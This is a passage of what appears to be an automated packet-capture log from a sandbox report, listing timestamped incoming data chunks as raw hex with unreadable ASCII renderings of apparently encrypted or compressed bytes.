78 bf 7c df ee bc fa 93 af 9f cd 16 26 8f dd a2 e7 37 25 95 3b e6 f7 33 ca 20 44 dc aa 51 24 58 13 bb bc bd b8 78 97 9f 38 a6 cd 38 4c 39 43 40 c8 1c cd e0 88 e3 15 66 4a 31 ec e8 91 d4 eb b4 73 81 6e 31 96 08 c6 11 6c 39 Data Ascii: Pj!wPpe...<lYh97lA$t7VXOGc9r5R/M;Pg%>g4{bv9v'/qLS\XIfi~)[''(I`LBuYkMoEx\|&7%;3 DQ$Xx88L9C@fJ1sn1l9
2022-10-03 14:13:31 UTC	149	IN	Data Raw: c0 62 d9 58 8e aa f5 7c 21 71 62 f6 fe 62 08 09 9d a3 fa cc 1f 9a 91 6f 1b 92 a5 80 3e 07 43 d4 14 f2 dd 35 99 3b c3 3d 79 4f da eb 57 de 7a fa f6 56 20 20 55 39 62 b9 8b 45 09 3b 3c ec 7c 50 92 42 84 2f 9c 57 61 ca ea c4 07 8e cb 61 2c 5e c7 07 0a ec 4b 8e 58 fe 87 45 69 53 4d b7 27 ee db c6 01 0a 01 1c a0 11 6c 96 17 d5 8c 80 d3 6f 58 bb df 20 86 01 19 c3 b9 2d a3 03 dd 3d 01 e7 a9 2f 75 f5 39 0f 58 08 30 e6 80 f6 91 6d 83 4a 98 57 10 98 06 18 65 57 17 93 7c 70 23 16 e3 b0 08 64 e7 a5 e0 65 bb 76 54 6a b4 09 10 57 84 c6 27 a7 43 4f ef 20 b3 db c0 c2 25 f1 6d 88 c4 82 72 81 8c d1 08 25 cc 97 28 a5 fc 8c 82 58 b4 18 9a aa b3 49 e5 1d 8a 2c a7 d2 fc da f3 fd fc e0 91 9b f8 16 bd 60 13 ef f4 bd 8c ea 3e b3 52 7c c8 ab b7 95 75 12 34 8e 09 b6 a7 b3 36 ea 67 Data Ascii: bX\|!qbbo>C5;=yOWzV U9bE;<\|PB/Waa,^KXEiSM'loX -=/u9X0mJWeW\|p#devTjW'CO %mr%(XI,`>R\|u46g
2022-10-03 14:13:31 UTC	151	IN	Data Raw: 7e 9a 01 0b 6c a3 13 60 65 1d 56 21 e8 bf 80 11 19 6d 59 84 17 78 87 b3 7c 92 d5 98 a2 4d 73 07 03 47 3f 90 dd e0 54 b0 4c c0 c5 a8 1f a6 9c 33 90 c5 12 cf 11 d9 69 f0 b6 99 e5 3e e0 9d 65 62 3c 84 9c 42 48 f4 16 f5 e6 5b 02 f5 43 ad b3 8d f3 3b d5 87 9a c7 d6 2f 70 2f 38 f6 55 17 97 8d 2b 9a b2 53 8d 33 fb d9 17 3a 09 88 1a 64 8c 1c 69 df d8 3e 0c 4d 42 34 41 76 3e 90 69 ba 89 5f 45 09 96 75 5d 2b 5a 03 2b 67 0a 69 84 c6 7b 49 ac 1e e7 ff 8e ef fb 47 f1 b2 24 2e 35 d6 48 84 1a ac 1a 69 0b 07 a6 82 f6 6f e6 38 ed f2 1a 52 d4 f8 db 08 57 f8 6f 08 59 93 98 83 89 36 7b 59 59 64 f2 63 03 9d 39 fa 86 c8 5c 2b a5 15 39 df 27 22 9e 3d b8 fb 6f 1e ba 32 e6 12 a5 04 78 c7 f0 e0 4b 99 fd 07 df dc 8f f8 f7 2e e1 62 a5 01 42 29 c1 5a 03 be b5 1b c6 15 49 95 ae cb a0 Data Ascii: ~l`eV!mYx\|MsG?TL3i>eb<BH[C;/p/8U+S3:di>MB4Av>i_Eu]+Z+gi{IG$.5Hio8RWoY6{YYdc9\+9'"=o2xK.bB)ZI
2022-10-03 14:13:31 UTC	152	IN	Data Raw: 2f 26 50 62 bb c3 21 d6 e9 a2 f4 e2 54 c6 33 1a 3a 6b 47 99 4c 35 40 de b7 c4 a9 7a cd 53 31 a0 e1 d6 0a 5f 5d 68 10 8b 50 65 ef 49 ed ac a8 f4 b6 6a 97 85 42 6e f4 5f d9 43 01 45 dd 9d ca e0 48 60 94 fa f3 69 15 5c 72 e7 0a 71 cc a6 39 1e 24 8f 80 f4 78 a7 2c 7c e5 13 ae 80 54 01 31 a7 84 05 bb 5c 9d 9f 29 69 7e 2f 57 4f d1 85 0e 6a 74 52 86 1b 70 e4 d8 1d 9e 6b 8c e4 5b 4e 7b b7 24 27 f1 82 c6 73 86 b8 44 f0 36 fc 56 24 87 cf e6 eb 0c 99 57 63 66 83 8d 81 91 55 f4 98 58 c3 0b 7a 70 36 8b 88 67 3a e7 41 d0 cd 15 79 c4 75 dd 1e f2 e2 20 5f af fa 69 ab 8e c0 bf 8e 4c 3c 46 17 f6 13 da 3a f7 b0 1e 80 a4 f3 e7 e0 0f d9 c4 81 a2 6c 00 aa fc 7b 0b 77 e3 f5 2d 2b 3c e8 7d 67 3b cf bf 6e fb 22 23 85 1f ce 8f a4 a6 57 b4 36 c2 9f d5 19 32 13 44 85 9e 6f 30 84 02 Data Ascii: /&Pb!T3:kGL5@zS1_]hPeIjBn_CEH`i\rq9$x,\|T1\)i~/WOjtRpk[N{$'sD6V$WcfUXzp6g:Ayu _iL<F:l{w-+<}g;n"#W62Do0
2022-10-03 14:13:31 UTC	153	IN	Data Raw: b2 f5 b7 cf 4e e2 9e 8a 55 c0 30 c1 e8 02 0c 6f a8 ac 31 05 ad 32 ad 95 4e b4 fb 88 e6 f3 bb 32 c7 8e ed 0a 30 33 02 cd b7 84 82 33 1d 36 b6 e5 a1 1e 7f 64 4a cc 3a a5 9a da 13 a3 8b 8a 81 c9 cd 3b 1b 9e 2b 51 40 1b be 7a 50 bb 88 39 b6 e9 a3 88 12 5a 39 24 74 43 f9 8e b7 01 94 01 09 69 61 da 0f 3d 95 3f 21 f9 1e 96 74 c6 46 38 15 66 9a 46 33 8c d7 a9 6d 67 a4 d8 0f e1 19 06 9c ca 4b 84 75 16 5e 3a 85 65 31 3d 1b 71 8a d5 83 d5 68 f4 c9 35 41 a8 4e 17 bb 56 c5 11 1e f4 a4 82 54 b7 ff 36 a3 85 3f 21 bd b6 f0 fa 88 a7 f8 a4 2f d4 05 50 ef fd b5 52 b5 d9 91 f9 8c b2 89 bb aa 39 4e 0e 18 e3 2a df bb a6 96 ef 50 c6 f8 0f 20 5e fa 68 8c 35 e3 5d 2b 2f 51 f8 e0 c0 a9 05 c2 44 08 90 f2 79 59 21 f1 ae 78 d7 a6 f4 33 6e 40 20 8d d9 ec d7 f4 42 da d2 12 8b 57 2e 46 Data Ascii: NU0o12N20336dJ:;+Q@zP9Z9$tCia=?!tF8fF3mgKu^:e1=qh5ANVT6?!/PR9N*P ^h5]+/QDyY!x3n@ BW.F
2022-10-03 14:13:31 UTC	154	IN	Data Raw: 5d 33 f9 ec b5 5c 3b a9 b8 dc 89 4f f4 00 25 88 4c d4 cd aa f5 63 52 88 94 36 b7 12 da 99 78 36 89 f9 cf 94 2c 96 63 bd b6 7e 5b 93 21 4e 75 2c 29 d6 43 b3 de 70 5c 0a 10 fa 87 52 ae 8b f4 af 9a 24 86 46 77 43 ca e6 12 9a b8 bc 53 17 75 16 e3 7b f8 82 06 51 43 ba b8 b9 cc a0 03 d3 ca 48 e6 04 7e 4a 6f 06 82 2d 05 ea f8 3c a4 27 fc da a8 65 2e 73 26 a6 b0 41 0e 10 d9 fd a0 89 68 dc 82 0a 74 fc f2 d2 25 2d 72 e9 2a d9 fe 52 bf 15 0b e4 a3 a1 07 29 da 39 fd 2c 7b be fd e8 83 e8 f3 2e 0f 96 f6 c0 ff 19 b7 d4 41 fe 54 dc 69 8b ae 3c 25 0a d0 54 0f 96 fc be 20 c7 d2 36 97 77 b2 22 58 b9 a2 a0 5b c8 35 f6 df f8 1b 2a 2b 3e e6 52 25 d2 4d 9e cc cd 88 3a 37 d2 91 61 f7 70 38 b9 c1 56 da 69 99 72 60 91 d5 47 33 90 4c 63 6e 43 47 88 f2 95 d9 24 e0 09 da 17 54 c6 62 Data Ascii: ]3\;O%LcR6x6,c~[!Nu,)Cp\R$FwCSu{QCH~Jo-<'e.s&Aht%-rR)9,{.ATi<%T 6w"X[5+>R%M:7ap8Vir`G3LcnCG$Tb
2022-10-03 14:13:31 UTC	156	IN	Data Raw: fc 4e 94 20 e8 03 1d cd be 50 76 f3 40 c3 fa ab d3 b3 9c 33 5d 2b 65 5f f4 1f 58 e3 4b 6b f6 36 4b 01 bc 71 e6 0a 76 91 34 5d ba 9f 7c ee 1f e0 c0 08 53 c3 b6 23 2a 1d 53 de 78 02 18 ed 60 9e 26 60 9a ef e0 4a 6f ea d2 7a 93 7b 36 9f 44 14 03 19 17 59 a8 4e 0a 78 f2 dc be fa 4e 2d 0d 6f df e3 ad 2e 09 77 fe c6 a9 b9 35 de 55 7a 46 bb 19 2f 21 46 0a 6f 81 ed 68 d9 dd 86 b5 06 c9 8b 75 55 af 47 5b 69 76 8e ec f8 e3 84 b6 04 53 72 a8 11 9f 19 02 4c f2 4f 3b 96 30 7f 81 6d 8f 2b bf 16 6c 50 36 d4 07 6a dd 9b c2 70 6d da 21 f9 08 ee ec 53 33 ca 6e 82 ec c7 b7 45 bd c5 d2 a3 89 6e 2f 49 00 bb 37 73 cb db 34 b0 9c 3a e9 75 81 93 61 72 7f e3 5e 12 d8 4b 62 c6 c8 77 5b 0b 2d 51 5b 1d 4c c9 24 f5 b1 28 0a 5c 90 56 4f 17 7a 1e 31 4c 14 6b 87 83 f1 85 7b c7 3b 11 4b Data Ascii: N Pv@3]+e_XKk6Kqv4]\|S#*Sx`&`Joz{6DYNxN-o.w5UzF/!FohuUG[ivSrLO;0m+lP6jpm!S3nEn/I7s4:uar^Kbw[-Q[L$(\VOz1Lk{;K
2022-10-03 14:13:31 UTC	157	IN	Data Raw: 89 f3 fb 8f b8 af e8 e8 d4 c6 d2 df d9 7a c4 74 cf 93 7e 98 ff 08 70 be 5e 56 38 97 aa fb 8a 78 e2 d3 bb ed c9 90 82 c8 d5 57 d5 cc c5 48 91 dd 3b 37 4f 3d 64 d0 89 45 73 30 f0 d4 68 62 12 74 be 3b f1 f1 32 8b 26 34 7d 3b a5 b2 23 2d 90 49 8e 3a 46 a6 f1 5e 55 65 16 af 24 f2 25 00 c9 e6 30 a8 c4 f5 b1 a5 5a d4 35 55 e1 d8 af af 55 37 fa 36 18 62 19 3b a1 11 f4 c6 ea 9e 81 7e 89 ff e9 64 4b 11 64 87 04 81 fd 70 17 04 ea ac b3 86 c7 73 9d 96 03 c2 af b7 94 d2 9d 47 8f 99 4a 52 b6 15 93 4c 7b 18 b8 e8 8a b8 0c 0f f4 8b 8b 06 62 07 3d ff 67 3b 85 c6 43 72 5f c2 dd 99 3d ca 23 05 85 47 e9 f8 39 53 69 e1 cf 46 c0 28 8e fe 6d 11 11 60 17 1b 97 96 26 57 5c 50 a2 20 6c cd 12 ca 50 ea 1c 38 89 85 a0 73 e7 ab 06 62 1a 9e 7a 6c b9 19 cf 0b a6 c6 3c 1e 0a 02 e7 4b 9c Data Ascii: zt~p^V8xWH;7O=dEs0hbt;2&4};#-I:F^Ue$%0Z5UU76b;~dKdpsGJRL{b=g;Cr_=#G9SiF(m`&W\P lP8sbzl<K
2022-10-03 14:13:31 UTC	158	IN	Data Raw: 5c bb 1a 45 f6 ab 87 c6 9f 83 e6 99 60 b3 a2 c4 24 76 e4 9d 8f f3 41 49 0e 77 98 3b 4d 67 ce d7 53 84 2e 80 41 9a 87 c5 a5 60 09 f0 1e 71 79 af 9d e4 b2 d9 1b 56 fe 78 c3 19 f9 a3 64 2b cd ec 7b c6 69 48 53 39 0f 27 87 e3 da c2 91 61 95 d6 58 bc f7 57 85 c7 93 3d a7 56 9f f3 02 a3 ef 0a 6d 8d 55 5d a0 9d 43 10 8b b4 76 76 41 46 d7 6d 52 13 d2 1e b8 0d 20 f4 9b 9e 37 32 96 89 c7 3f cc 86 3c d7 9e dd 98 85 df 69 91 b1 bb 34 60 60 28 91 eb aa ad 1e 4c 63 f0 be bb 07 54 2f 0d 9b 61 fc a2 95 6e dc e2 d8 95 c0 a9 7f 0a 88 2a 3d 78 61 85 2b 75 9d bf 6f b9 f7 a2 9e 78 18 0f 0f 4e 79 c5 b5 8a 3b f1 03 9b 84 f1 48 e6 be 69 cf a4 64 83 58 dd 5e c5 b8 9a f3 0e d9 ad 0a 7a 52 c0 d7 76 3d ed 5e b2 af 1c 58 a8 11 b2 da e2 8f 08 f3 a3 b3 f3 fb 51 53 03 5b 87 23 28 b9 50 Data Ascii: \E`$vAIw;MgS.A`qyVxd+{iHS9'aXW=VmU]CvvAFmR 72?<i4``(LcT/an*=xa+uoxNy;HidX^zRv=^XQS[#(P
2022-10-03 14:13:31 UTC	159	IN	Data Raw: ab 06 c6 d5 f1 56 f3 c0 6d d4 b7 bd c1 78 95 bc 32 a6 2b 00 95 09 63 60 59 00 10 f8 ae 1c 2c 76 9c 0e d2 13 5d f5 f2 8a e3 ff 6f 2f e4 1f f0 e6 22 19 f8 7b fb ba 14 cb f7 bb ac e2 fd e2 9e cc db d1 93 db 57 e8 bb 65 c6 d0 2e 9c 66 97 15 cb 69 51 60 1c 82 13 3e 46 02 39 1e 60 c9 0c a4 3c 77 04 dc 03 4b b9 cd b1 9c a6 3f 51 81 9b 71 05 0f a7 42 e2 61 78 f6 39 39 99 a3 f1 d4 89 4c 52 91 b7 28 2d 8a 6c e4 96 7f 32 c2 ca 34 8a 0e af ce bf 44 4d 5c 8c 9b 4a 8e 0e 2f d2 cd b2 f7 4b 6e 15 e0 fa b0 7d 84 b2 3a 90 0b 2a e7 72 19 67 06 24 cf 1d 35 4c bf f6 ab c6 56 80 15 7f de 95 4e 49 48 1b 10 7e ce 13 7a b2 36 d1 18 d6 e6 e1 2c ed 83 12 30 d8 52 c2 e0 05 76 f6 95 db 6c 76 52 bb ea fa 09 15 45 5c ac 36 00 fa ba 1d 1a 26 7f b9 e6 4c b2 46 8e d1 38 a4 96 77 cc 0c 86 Data Ascii: Vmx2+c`Y,v]o/"{We.fiQ`>F9`<wK?QqBax99LR(-l24DM\J/Kn}:*rg$5LVNIH~z6,0RvlvRE\6&LF8w
2022-10-03 14:13:31 UTC	161	IN	Data Raw: ba 42 10 71 4a 52 ee 4c a1 60 89 58 67 0f 2a 08 73 18 1e 71 04 20 99 65 f5 d7 6c 69 29 0e 4d b8 95 dc ee 16 25 7e 79 e5 98 a2 4b bd 9f 3f 38 af 3a e3 dc 9c df d1 4e 93 c0 72 90 7f 1e 62 1a 1e 14 e3 5c 22 53 a1 f1 75 68 11 cc ff ed 9e ff 18 c1 c9 e6 72 68 e9 d9 c3 42 fa 69 30 2c 44 ed fd 14 e3 ca df ff 6a 1e 58 65 bb ee 18 1e 3a e4 09 0a cc 2e 55 73 e1 73 eb a2 81 40 89 a7 13 63 02 b6 5c e0 0e 44 c1 1e 5a 61 1f 5b 12 b7 77 7b 19 d4 80 38 40 c1 85 c3 f8 f7 03 26 e4 1e 3e 55 c8 e1 eb 32 2d 50 f9 e7 20 ae 44 5d a8 41 22 0a 86 03 1d fc 88 6f 86 c7 73 78 dd de c2 fe 91 e2 97 1c ae 23 19 6a 21 7b e1 d1 a0 25 39 ed f4 02 bc 07 20 58 44 e9 2e b3 84 ea 0e 29 93 47 fc bf c6 31 60 89 52 5e 2f 23 cc df 20 1a f8 33 dc 87 d6 91 0b 3d 55 69 12 86 9e 27 d7 1e f7 12 90 f5 Data Ascii: BqJRL`Xg*sq eli)M%~yK?8:Nrb\"SuhrhBi0,DjXe:.Uss@c\DZa[w{8@&>U2-P D]A"osx#j!{%9 XD.)G1`R^/# 3=Ui'
2022-10-03 14:13:31 UTC	161	IN	Data Raw: 25 ac 0b 3c 48 45 50 bc 5d 4f c1 1c c2 44 a5 15 94 93 88 ab 7d f6 d3 17 4b 01 97 6f 28 98 bc f9 28 83 eb 00 be 27 3f ce 47 8a ff 8a ca 69 62 7b af 14 fe bb 1c c8 8e 84 99 63 c5 89 c9 29 b1 2b ed ee 96 15 92 39 ba 0c be f6 ae 31 60 ed d0 1c 4e 14 0c c1 ed d7 02 52 98 4a ad 64 d6 b8 2c 29 74 69 74 b8 e7 41 14 17 f4 9b 6b 4d de 80 cc 42 07 8f 27 a3 6d d2 c9 8a 7b 16 f7 74 97 9e 64 e0 e6 33 08 15 c8 0d c4 63 29 6e f1 5a 00 02 6e c2 20 6e d5 49 4c 73 66 ba 5f f2 3d 4b e5 aa 4b f2 60 d2 db 71 0e 2a 15 4e 51 1f ca 40 27 ca 65 aa ad 6f 68 39 13 39 f1 2b 63 f2 13 76 7e 1a 48 8f a2 4b a0 20 75 39 6e 6e e4 89 8c b8 75 4f 92 c0 6f 2f 35 1f a6 5e 19 43 e3 2d 39 45 a0 f1 68 1d 54 72 34 f1 9c a9 18 b4 07 e7 72 68 f4 66 8e 43 37 75 3b 7b 44 93 42 17 e3 ca e2 52 3f 1f 82 Data Ascii: %<HEP]OD}Ko(('?Gib{c)+91`NRJd,)titAkMB'm{td3c)nZn nILsf_=KK`q*NQ@'eoh99+cv~HK u9nnuOo/5^C-9EhTr4rhfC7u;{DBR?
2022-10-03 14:13:31 UTC	163	IN	Data Raw: 45 07 77 d8 f6 46 c0 6c 97 1a 14 f9 bb d0 a5 93 20 85 c8 af 82 83 7d c6 fb 14 b7 2a 8e 99 d3 59 df 20 27 3a 78 b2 1f 15 87 9c 20 6e 79 69 e7 2a be 6e a1 3f 6d 8c 4c fe 5d 2f 76 a3 b4 9e d0 62 1e 15 72 eb 01 b4 2e 8e d9 d0 12 25 b2 30 10 93 13 1b 5c 60 63 d2 c0 ba 83 86 6d c5 92 38 49 65 03 a0 8f 66 b3 dd c3 1c 3f 62 43 60 cd bf 78 b6 4e 7e 25 b1 b6 d9 7f 79 d0 b0 d9 15 25 aa a9 1a 7d e9 e0 68 3d 58 74 d0 c5 ab 9b a9 bc 8f 48 77 c8 06 c0 28 6e b8 3d dc 08 5d 2f ec 0c bb 44 34 a9 9a 2e b7 d6 86 e2 d4 ec 5d c4 70 c0 1b 4b 8e ea 45 6b 70 7f bf 91 fe 4b b6 fc 93 d7 bc b0 0c 06 af 97 a1 6c 27 03 60 ac e7 65 25 c6 08 10 db 38 5e 08 da 50 d6 ed b5 ba 58 de 9c 4f b6 51 1d de 29 20 70 38 0e 72 e1 bb 1e 3b 66 f5 2e dd 11 96 d4 52 9f ec fd 07 30 39 0a ff e4 68 39 35 Data Ascii: EwFl }Y ':x nyin?mL]/vbr.%0\`cm8Ief?bC`xN~%y%}h=XtHw(n=]/D4.]pKEkpKl'`e%8^PXOQ) p8r;f.R09h95
2022-10-03 14:13:31 UTC	164	IN	Data Raw: f1 40 de 08 7d 78 de 87 db e6 5c 5c c5 d9 e9 69 00 53 21 9e 36 7c df ac 3e 10 7d 83 b0 f0 68 a0 26 53 cc 2e 81 84 66 39 77 b1 23 0f 93 76 30 8e 12 6e 73 05 7f 6a dd bc a8 4d 44 50 78 09 4d c1 1c df 57 ea 50 17 32 8d aa 7d 0a 86 1e 4b 01 8a 7c 67 9d 00 53 2d 82 eb 34 01 25 3f ce 5a 99 b0 99 76 de 67 7a af 78 51 a9 1c c8 93 c2 dc d8 40 ac cd 28 b1 83 04 ec 96 15 8f 7f ff b4 13 d9 aa 33 70 31 0a 0e 4e 14 11 42 aa 69 ab 6c 9c 48 ad 70 06 ba 2c 29 69 2f 3f bb 5f 09 10 15 f4 d3 0a 59 de 80 d1 53 4d 31 89 c3 69 d0 c9 12 45 15 f7 74 8a 9f 2e 5e 54 5c 0c 17 c8 b9 a0 76 29 6e ec 5c 52 58 fa d0 25 6c c5 f5 3e 70 66 ba 42 f1 7f e3 5b 3b 4e f0 60 66 7a 64 0e 2a 08 48 02 45 50 52 22 c8 65 bd f4 6c 68 39 0e 2f ba 95 dc 75 16 74 7e 37 c6 9a a2 4b bd 36 3e 87 ae e9 e1 8a Data Ascii: @}x\\iS!6\|>}h&S.f9w#v0nsjMDPxMWP2}K\|gS-4%?ZvgzxQ@(3p1NBilHp,)i/?_YSM1iEt.^T\v)n\RX%l>pfB[;N`fzd*HEPR"elh9/ut~7K6>
2022-10-03 14:13:31 UTC	165	IN	Data Raw: 24 b3 84 df 0c b5 90 8c ba b6 76 3b df e0 5d 5e 2f 1e ce 7a 23 d1 fe 21 86 a6 82 e7 01 3d 55 54 10 21 9d ec 91 17 5a 18 56 89 f3 4a f6 fb 57 f6 ef 2d 8b 14 33 19 54 f0 c2 b3 56 96 ec 5f 1b 51 af ee e1 54 fd 6c 9d 9e c8 16 81 38 d6 ad 85 ec 5f ea 0f 85 d1 c3 d7 04 2a 7e b4 59 05 96 ff 5a 1f cf 60 90 12 8f ee 0e 19 1a 8a 12 13 98 d2 08 bb e2 d2 55 64 69 05 24 7a 3c 09 58 62 86 58 72 22 c5 20 46 93 67 08 0b cf 34 4a bf bb f4 96 6b c5 2d b9 50 76 25 1f 31 0d ea dd c5 1c 80 63 c5 f0 cb ae e7 08 1f 6b 29 b9 19 af 46 71 d6 90 30 12 7d 1d ae 3f 95 e7 b0 e9 52 58 49 f2 95 a5 95 06 05 ab c9 6f ce a4 16 29 fc b1 3b da bf 00 9c f6 0a b3 24 86 90 92 28 b7 69 81 64 7b eb 4e 7b 79 90 db 24 8e 45 43 3b 7e 79 10 7e ec 1b b6 fa 4f 5c ba e0 04 00 eb 2a f6 e0 0e 0f 68 13 d6 Data Ascii: $v;]^/z#!=UT!ZVJW-3TV_QTl8_~YZ`Udi$z<XbXr" Fg4Jk-Pv%1ck)Fq0}?RXIo);$(id{N{y$EC;~y~O\h
2022-10-03 14:13:31 UTC	167	IN	Data Raw: 68 15 06 f0 05 58 94 92 78 89 26 08 ae 72 4c 78 06 24 5d 1d 64 4a 2e df 28 c9 15 a9 3b 57 cc 95 14 64 2b 1d bd 7f 50 12 2c 94 24 d1 f5 db 13 c7 28 cd 58 3d 82 ff 63 c2 0a 2d 58 de 07 db f0 7a fb 9f 5a f5 4a 01 53 79 be 36 fc df ba 18 b7 27 09 ac d3 69 a0 46 73 cc ae 81 92 57 9e 17 25 aa 2c 92 76 bc ae 12 ee 73 13 4c dd ac 59 32 6e 45 50 bc 29 4d 41 1c c9 64 5d 15 d9 9d ae ab 7d f6 a6 1e cb 01 9c 4f d0 98 fd f7 0b 83 eb 00 20 25 bf ce 4c aa 07 8a b7 67 41 7b af 14 70 a9 9c c8 80 a4 61 63 8b 87 eb 29 b1 2b 25 ec 16 15 99 19 42 0c e3 f8 83 31 70 ed 2b 0e ce 14 07 e1 05 d0 a2 43 b7 4a ad 64 24 ba ac 29 7f 49 82 b8 46 50 3b 17 f4 9b 28 59 5e 80 c2 62 f2 8f aa b2 42 d2 bd 14 67 15 f7 74 8c 86 75 c0 db 22 27 15 44 93 82 76 29 6e ea 42 11 22 78 d3 0f 6e 41 d6 1c Data Ascii: hXx&rLx$]dJ.(;Wd+P,$(X=c-XzZJSy6'iFsW%,vsLY2nEP)MAd]}O %LgA{pac)+%B1p+CJd$)IFP;(Y^bBgtu"'Dv)nB"xnA
2022-10-03 14:13:31 UTC	168	IN	Data Raw: dc e9 b2 2d 8d f9 45 27 b5 53 b6 ae f5 00 37 84 81 1d 31 90 36 a6 d4 73 d5 dc 6a 23 cb 93 6a 97 d1 ae 9e 19 27 36 dd e7 85 48 10 3b 61 f4 cf b4 a0 2c 28 53 90 2c 3b 6c df 0c b5 93 8a f4 1b ca 47 77 ad 55 ca c7 1e ce 7a 20 d7 f0 5a f5 a9 d7 a1 09 f5 bd 54 10 21 9e ea df 7a de 5e 94 c4 fb 9e 1e fb 57 f6 ec 2b c5 4a b7 9a 90 bd ca bb bf 96 ec 5f 18 57 e1 84 76 ca 96 21 95 8a c6 70 81 38 d6 ab 9c 8c 38 de 8a c1 d9 8b ca 62 2a 7e b4 5f 1b 1f 98 77 ea 82 68 c1 d3 e8 ee 0e 39 1c 84 41 5f a7 2e 45 b3 86 f7 32 64 69 05 22 6b 83 b7 10 9f cb 50 4a c9 c5 20 46 13 61 01 70 51 cb 45 f1 b3 48 7d 6b c5 2d 39 56 67 ba a1 29 7f a7 d5 89 f1 80 63 c5 70 da bf 78 b6 01 6e 67 b1 95 32 2f 71 d6 b0 36 14 ca a3 85 02 db ef 84 8f 3b 58 49 d2 94 a3 22 a8 59 96 86 67 22 f4 7f 29 fc Data Ascii: -E'S716sj#j'6H;a,(S,;lGwUz ZT!z^W+J_Wv!p88b*~_wh9A_.E2di"kPJ FapQEH}k-9Vg)cpxng2/q6;XI"Yg")
2022-10-03 14:13:31 UTC	169	IN	Data Raw: 51 ab 89 d5 7e 11 d2 a8 80 9e f4 ac 38 35 82 5c ca ce 44 e9 00 75 d8 83 fc e0 4c e4 96 65 21 8a 6d cf d7 0f e8 7c 4d f8 64 46 8c 3f 5f 71 27 3b a7 42 ef de 28 2f 14 06 f0 85 4b 82 0d c6 a2 ad 40 8c ae 0b 79 06 24 dd 0e 72 c0 95 ab a2 81 36 ad 70 56 cc 95 94 77 3d 16 1c 0b d7 5a 0f 24 69 d0 f5 db 93 d4 3e 0b f3 4e 05 b7 40 16 44 2c 58 96 87 c8 e6 e9 65 eb e3 bd 69 41 03 78 be 36 7c cc ac 2c 0d 53 b9 e4 f0 61 f3 47 73 cc 2e 92 84 aa 07 63 8b e2 0f ae 22 bd ae 12 6e 60 05 57 67 d8 87 7a 4d 05 06 bd 29 4d c1 0f df 6a c9 61 16 d5 8d 07 2a f7 a6 1e 4b 12 8a c0 69 b3 22 bf 2d af b3 01 20 25 3f dd 5a e8 bd fe 4f 2f 67 1b f5 15 70 a9 1c db 93 6d df 48 66 cf cc 41 ea 2a 25 ec 96 06 8f 6c d6 78 01 b0 ab 0d 2d ec 2b 0e 4e 07 11 56 af a3 b1 14 9d 22 f3 65 24 ba 2c 3a Data Ascii: Q~85\DuLe!m\|MdF?_q';B(/K@y$r6pVw=Z$i>N@D,XeiAx6\|,SaGs.c"n`WgzM)MjaKi"- %?ZO/gpmHfA%lx-+NV"e$,:
2022-10-03 14:13:31 UTC	170	IN	Data Raw: 19 99 95 e0 ce 23 8b 91 6c a7 e0 46 e9 c0 87 e8 36 a4 68 65 45 19 3e 37 0f 59 c1 7b 5c c9 a0 5a 3d a6 30 e5 87 bc 80 25 40 b3 83 69 11 fc c8 2e a3 a1 1f 8d c9 dc e9 b2 2b 9b 46 eb c9 87 03 f2 b6 98 23 37 84 81 1b 37 27 6b ab da 34 91 94 04 c3 cb 93 6a 91 d7 01 27 4e 69 66 99 47 0b a1 10 3b 61 f2 d1 e7 24 e1 58 03 d4 74 68 85 df 0c b5 82 94 9d 94 41 31 27 e9 e1 7c 2f 1e ce 7a 26 c9 a3 18 ce 87 91 e5 6d e1 54 54 10 21 98 e4 2a 0d bf 13 d7 80 63 96 f7 fb 57 f6 ea 25 c4 0d 51 13 c0 f9 6e 6f 57 96 ec 5f 1e 59 24 cb 71 74 c6 65 4d 42 2e 70 81 38 d0 a5 42 d2 0e e1 ce 85 3d 1f 22 62 2a 7e b2 41 48 bf 5e 76 a9 c6 f4 4f 3b e8 ee 0e 38 1a 23 1b e5 9e 69 01 37 02 1f 32 64 69 04 24 d4 3d 41 5f d9 8f 92 92 23 c5 20 46 02 7f 78 0a f6 35 15 b5 07 d6 96 6b c5 2d 3f 48 3c Data Ascii: #lF6heE>7Y{\Z=0%@i.+F#77'k4j'NifG;a$XthA1'\|/z&mTT!cW%QnoW_Y$qteMB.p8B="b~AH^vO;8#i72di$=A_# Fx5k-?H<
2022-10-03 14:13:31 UTC	172	IN	Data Raw: d5 c1 b0 aa ea e2 26 02 ed df cd d1 e1 c6 ce fd 98 67 fe c2 21 76 71 97 93 c0 e0 45 15 1a c0 38 71 52 20 c7 63 79 21 28 24 3c ca 0f f6 15 0d b9 8f 68 ef b5 39 51 3d 9a 13 2e 20 a5 e3 c7 fd ae ed 39 35 82 ca d9 e4 8b c1 77 3e 9f fd d2 a3 4d e4 96 f3 32 73 eb fe a0 44 af e6 5b ba 65 46 8c a9 4c 10 24 10 d0 09 a8 68 b2 69 15 06 f0 13 58 3a b5 f2 8a ff 07 5e 8c 4d 78 06 24 4b 1d f9 68 a4 dc e9 c6 d8 57 3a 57 cc 95 02 64 b1 34 37 7c 9c 1d 05 6b 25 d1 f5 db 05 c7 8b ef c2 39 4e f0 65 3d 0b 2d 58 de 11 db 0e 48 71 9c a8 fa 28 fe 52 79 be 36 ea df 73 3a 3d 24 f2 a3 ad 96 a1 46 73 cc b8 81 96 64 14 14 c0 a5 76 6d 77 bc ae 12 f8 73 0c 6f 57 af cc 3d d8 ba 51 bc 29 4d 57 1c 85 50 d7 16 5d 92 3c 54 7c f6 a6 1e dd 01 b7 6c 5a 9b 70 f8 e1 7c ea 00 20 25 a9 ce 07 9f 8d Data Ascii: &g!vqE8qR cy!($<h9Q=. 95w>M2sD[eFL$hiX:^Mx$KhW:Wd47\|k%9Ne=-XHq(Ry6s:=$FsdvmwsoW=Q)MWP]<T\|lZp\| %
2022-10-03 14:13:31 UTC	173	IN	Data Raw: 79 90 90 72 60 76 1c 62 5f 1c d4 e3 1d 09 66 a2 a1 75 6c 10 71 fe f0 9e 3f 18 d0 cc d1 70 38 e9 f4 ca 40 fa 74 30 ec 44 c4 d6 23 e1 9a df e3 64 1c 58 78 bb 2e 18 00 3f d3 0a 5a cc 45 5c 71 e1 46 e9 56 81 96 a2 90 11 33 02 ec 52 e2 0e 59 c1 ed 5a 18 1a 6e 11 f7 77 f2 12 69 81 25 40 25 85 88 d3 c8 00 76 e4 99 36 57 c8 dc e9 24 2d 63 fc df 23 fe 44 a8 a7 43 22 37 84 17 1d 9b a4 58 85 97 73 ea d5 dc c2 cb 93 fc 97 c8 a8 14 1a 3a 21 04 ee d3 a0 10 3b f7 f4 26 92 30 23 08 44 6a 25 b1 84 df 0c 23 93 05 fd 80 c5 61 60 36 5c 5c 2f 1e 